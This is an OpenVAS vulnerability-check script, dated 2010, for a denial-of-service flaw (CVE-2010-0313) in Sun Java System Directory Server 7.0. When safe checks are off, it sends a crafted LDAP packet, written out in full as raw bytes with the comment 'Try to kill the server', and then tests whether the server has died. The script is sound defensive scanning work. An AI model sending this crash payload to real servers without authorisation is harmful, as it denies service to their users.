###############################################################################
# OpenVAS Vulnerability Test
# $Id: sun_dir_server_37699.nasl 8291 2010-07-05 13:13:29Z mime $
#
# Sun Java System Directory Server 'core_get_proxyauth_dn' Denial of Service Vulnerability
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2010 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if (description)
{
 script_id(100438);
 script_tag(name:"cvss_base", value:"7.8");
 script_cve_id("CVE-2010-0313");
 script_bugtraq_id(37699);
 script_version ("1.0-$Revision: 8291 $");
 script_tag(name:"risk_factor", value:"High");

 script_name("Sun Java System Directory Server 'core_get_proxyauth_dn' Denial of Service Vulnerability");

desc = "Overview:
Sun Java System Directory Server is prone to a denial-of-service
vulnerability.

An attacker can exploit this issue to crash the effected application,
denying service to legitimate users.

Directory Server 7.0 is vulnerable; other versions may also be
affected.

References:
http://www.securityfocus.com/bid/37699
http://intevydis.blogspot.com/2010/01/sun-directory-server-70.html
http://www.sun.com/software/products/directory_srvr/home_directory.xml

Risk factor : Medium";

 script_description(desc);
 script_summary("Determine if Sun Java System Directory Server is prone to a denial-of-service vulnerability");
 script_category(ACT_MIXED_ATTACK);
 script_family("Denial of Service");
 script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
 script_dependencies("sun_dir_server_detect.nasl");
 script_require_ports("Services/ldap", 389);
 exit(0);
}

include("version_func.inc");

port = get_kb_item("Services/ldap");
if(!port)exit(0);
if(!get_port_state(port))exit(0);

if(safe_checks()) {
  
  if(!version = get_kb_item(string("ldap/",port,"/SunJavaDirServer")))exit(0);
  
  if(!isnull(version)) {
    if(version_is_equal(version: version, test_version: "7.0")) {
      security_warning(port:port);
      exit(0);
    }
  }
} 

else {

  include("ldap.inc");
  
  if(!ldap_alive(port:port))exit(0);
 
  # Try to kill the server
  req = raw_string(0x30,0x82,0x01,0x15,0x02,0x01,0x01,0x63,0x82,0x01,0x0e,0x04,0x00,0x0a,0x01,0x02,
		   0x0a,0x01,0x00,0x02,0x01,0x00,0x02,0x01,0x00,0x01,0x01,0x00,0x87,0x0b,0x6f,0x62,
		   0x6a,0x65,0x63,0x74,0x43,0x6c,0x61,0x73,0x73,0x30,0x02,0x04,0x00,0xa0,0x81,0xe9,
		   0x30,0x81,0xe6,0x04,0x18,0x32,0x2e,0x31,0x36,0x2e,0x38,0x34,0x30,0x2e,0x31,0x2e,
		   0x31,0x31,0x33,0x37,0x33,0x30,0x2e,0x33,0x2e,0x34,0x2e,0x31,0x38,0x01,0x01,0x01,
		   0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,
		   0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,
		   0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,
		   0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,
		   0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,
		   0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,
		   0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,
		   0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,
		   0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,
		   0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,
		   0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,
		   0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,
		   0x01,0x01,0x01,0x01,0x01,0x01,0x00,0x04,0x00);

  soc = open_sock_tcp(port);
  if(!soc)exit(0);
  send(socket:soc, data:req);
  close(soc);

  sleep(5); # server needs a few seconds to die,
  
  if(!ldap_alive(port:port)) {
    security_warning(port:port);
    exit(0);
  }  
}  

exit(0);
